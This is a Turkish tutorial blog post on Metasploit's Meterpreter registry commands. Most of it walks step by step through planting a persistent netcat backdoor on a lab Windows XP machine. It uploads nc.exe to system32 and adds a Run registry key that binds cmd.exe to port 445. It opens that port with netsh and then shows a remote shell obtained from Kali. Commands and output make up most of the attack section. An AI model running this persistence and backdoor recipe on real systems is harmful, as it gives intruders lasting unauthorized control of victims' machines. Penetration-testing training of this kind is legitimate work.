MSF Registry Üzerinde Çalışma

Estimated read time 6 min read

Windows Registry İşlemleri

Windows Registry ayarları, neredeyse tüm işlemlerin kayıtlarının tutulduğu sihirli bir alan gibidir. Bu alanda yapacağınız tek bir değişiklik, sistemde gerekli yetkiyi almanızı sağlayabilir. Bunun yanında, yapılacak hatalı bir işlem ise sistemin bir daha açılmamasına da sebep olabilir. Dikkatli ve acele etmeden hareket etmek gerekmektedir.

Meterpreter, Windows Registry üzerinde işlem yapmanızı sağlayacak bir çok komut sunmaktadır. Bunlara kısaca bakalım. Bir sistemde Meterpreter shell açtığınızda reg komutunu verdiğinizde yardım bilgilerini görebilirsiniz.

meterpreter > reg
Usage: reg [command] [options]

Interact with the target machine's registry.

OPTIONS:

  -d  The data to store in the registry value.
  -h  Help menu.
  -k  The registry key path (E.g. HKLM\Software\Foo).
  -t  The registry value type (E.g. REG_SZ).
  -v  The registry value name (E.g. Stuff).

COMMANDS:

  enumkey  Enumerate the supplied registry key [-k >key>]
  createkey Create the supplied registry key [-k >key>]
  deletekey Delete the supplied registry key [-k >key>]
  queryclass Queries the class of the supplied key [-k >key>]
  setval   Set a registry value [-k >key> -v >val> -d >data>]
  deleteval Delete the supplied registry value [-k >key> -v >val>]
  queryval  Queries the data contents of a value [-k >key> -v >val>]

Yardım komutunun sonucunda görebileceğiniz gibi, reg komutu, Registry üzerinde okuma (queryval), yazma (setval), yeni ayarlama oluşturma (createkey) ve silme (deletekey) olanağı sağlamaktadır.

Bu komutlar sayesinde yeni değerler oluşturma, değerleri değiştirme yapabileceğiniz gibi doğru yerlere bakarak sistem hakkında bilgi toplama işlemleri de yapabilirsiniz. Windows Registry içerisinde hangi değerin nerede kayıt edildiği hakkında kendinizi geliştirmenizi tavsiye ediyorum. Bir fikir vermesi açısından bağlantıda bulunan PDF dosyasını inceleyebilirsiniz. List

Kalıcı Netcat Arka Kapısı

Aşağıda adım adım gerçekleştireceğimiz örnekte, hedef sisteme netcat programını yerleştireceğiz. Registry ayarlarında işlemler yaparak netcat programının bilgisayar açıldığında otomatik başlamasını ayarlayacağız. Sistemde bulunan Firewall ayarlarının, netcat programına ve 445 numaralı porta müsaade etmesini sağlayacağız.

nc.exe Programını Yükleme

Öncelikle hedef Windows işletim sisteminin içerisine nc.exe olarak bilinen netcat programını yükleyelim. Bunun için önceden bir şekilde meterpreter shell açmış olmalısınız. Bununla ilgili örnekleri önceki yazılarımızda belirtmiştik. Kali işletim sistemi içerisinde /usr/share/windows-binaries/ klasöründe faydalı bir kaç programı bulabilirsiniz.

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading : /tmp/nc.exe -> C:\windows\system32
[*] uploaded  : /tmp/nc.exe -> C:\windows\system32nc.exe

netcat Başlangıçta Otomatik Çalışsın

nc.exe programının işletim sisteminin her başladığında çalışması için Registry içinde HKLM\software\microsoft\windows\currentversion\run anahtarına bir değer oluşturmalısınız. Öncelikle, mevcut değerleri ve ayarları görelim. Ters \ işaretlerinin iki defa yazıldığına dikkat edin.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

 Values (3):

  VMware Tools
  VMware User Process
  quicktftpserver

Komut çıktısında görüldüğü gibi şu an için VMware Tools, VMware User Process, quicktftpserver yazılımları otomatik başlamaya ayarlanmış durumda. Biz yeni ayarımızı reg setval komutu ile ilave edelim ve reg queryval komutu ile tekrar kontrol edelim.

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe

Firewall Ayarları

Doğrudan Registry ayarlarından yapabileceğinizi gibi netsh komutu ile de firewall ayarlarını yapabilirsiniz. Kullanımı göstermek açısından, firewall ayarlarını komut satırından ayarlayalım. Bunun için Meterpreter komut satırından Windows komut satırına girelim.

meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ >

Firewall ayarlarının mevcut halini görelim.

C:\ > netsh firewall show opmode
Netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode         = Enable
Exception mode          = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode         = Enable
Exception mode          = Enable

Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode         = Enable

Şimdi 445 numaralı Portu izin verilen Portlar arasına ekleyelim.

C:\ > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
Ok.

Yaptığımız işlemin hayata geçip geçmediğini kontrol edelim.

C:\ > netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port  Protocol Mode   Name
-------------------------------------------------------------------
139  TCP    Enable  NetBIOS Session Service
445  TCP    Enable  SMB over TCP
137  UDP    Enable  NetBIOS Name Service
138  UDP    Enable  NetBIOS Datagram Service

Port configuration for Standard profile:
Port  Protocol Mode   Name
-------------------------------------------------------------------
445  TCP    Enable  Service Firewall
139  TCP    Enable  NetBIOS Session Service
445  TCP    Enable  SMB over TCP
137  UDP    Enable  NetBIOS Name Service
138  UDP    Enable  NetBIOS Datagram Service


C:\ >

Hedef sistem tekrar başladığında nc.exe otomatik olarak çalışacak ve dışarıdan bağlantılara imkan sağlayacaktır. Aşağıdaki örnekte nc komutuyla hedef sisteme bağlanılabildiği görülmektedir.

root@kali:~# nc -v 172.16.104.128 445
172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [172.16.104.128] 445 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\ > dir
dir
Volume in drive C has no label.
Volume Serial Number is E423-E726

Directory of C:\

05/03/2009 01:43 AM
.
05/03/2009 01:43 AM
..
05/03/2009 01:26 AM 0 ;i
05/12/2009 10:53 PM
Desktop
10/29/2008 05:55 PM
Favorites
05/12/2009 10:53 PM
My Documents
05/03/2009 01:43 AM 0 QCY
10/29/2008 03:51 AM
Start Menu
05/03/2009 01:25 AM 0 talltelnet.log
05/03/2009 01:25 AM 0 talltftp.log
4 File(s) 0 bytes
6 Dir(s) 35,540,791,296 bytes free

C:\ >

Gerçek durumlarda, böyle bir arka kapı açmak bu kadar kolay olmasa da uygulanacak işlemlerin mantığı yukarıda anlatıldığı gibidir. Bu yazıda, Registry kayıtları kullanarak bir arka kapı açmanın mantığını açıklamaya çalıştık. Yukarıdaki örneği birebir uygulayıp başarısız olursanız umutsuzluğa kapılmayın. Daha sıkı çalışın.